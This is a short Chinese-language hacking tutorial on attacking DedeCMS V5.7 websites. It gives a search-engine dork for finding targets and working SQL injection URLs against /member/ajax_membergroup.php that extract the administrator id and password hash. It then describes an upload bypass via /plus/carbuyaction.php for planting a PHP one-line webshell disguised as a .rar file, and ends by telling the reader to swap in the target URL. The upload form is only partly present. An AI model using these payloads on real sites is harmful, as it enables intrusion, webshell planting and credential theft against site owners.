漏洞描述:百度搜索關鍵字Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc,獲得使用DeDeCMS系統(tǒng)的網(wǎng)站。 注入漏洞。首先訪問/data/admin/ver.txt頁面獲取系統(tǒng)最后升級時間,然后訪問/member/ajax_membergroup.php?action=postmembergroup=1頁面, 然后訪問/
漏洞描述:百度搜索關鍵字“Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc”,獲得使用DeDeCMS系統(tǒng)的網(wǎng)站。
注入漏洞。首先訪問“/data/admin/ver.txt”頁面獲取系統(tǒng)最后升級時間,然后訪問“/member/ajax_membergroup.php?action=post&membergroup=1”頁面,
然后訪問“/member/ajax_membergroup.php?action=post&membergroup=1”頁面,如圖說明存在該漏洞。
然后寫上語句/member/ajax_membergroup.php?action=post&membergroup=@`’` Union select userid from `%23@__admin` where 1 or id=@`’` 查看管理員id
/member/ajax_membergroup.php?action=post&membergroup=@`’` Union select pwd from `%23@__admin` where 1 or id=@`’` 查看管理員密碼
得到的是19位的,去掉前三位和最后一位,得到管理員的16位MD5
上傳漏洞。要求網(wǎng)站開啟新會員注冊功能,首先注冊新會員,無需通過郵件驗證,
只要登陸會員中心,然后訪問頁面鏈接
“/plus/carbuyaction.php?dopost=memclickout&oid =S-P0RN8888&rs[code]=../dialog/select_soft_post”
說明通過“/plus/carbuyaction.php”已經(jīng)成功調用了上傳頁面“/dialog/select_soft_post”
于是將Php一句話木馬擴展名改為“rar”等,利用提交頁面upload1.htm
enctype=”multipart/form-data” name=”form1″>
file:
newname:
提交
?
把url改成目標url就行了。還有個全局變量提交,繞過注冊的可以去黑防2月刊上面看。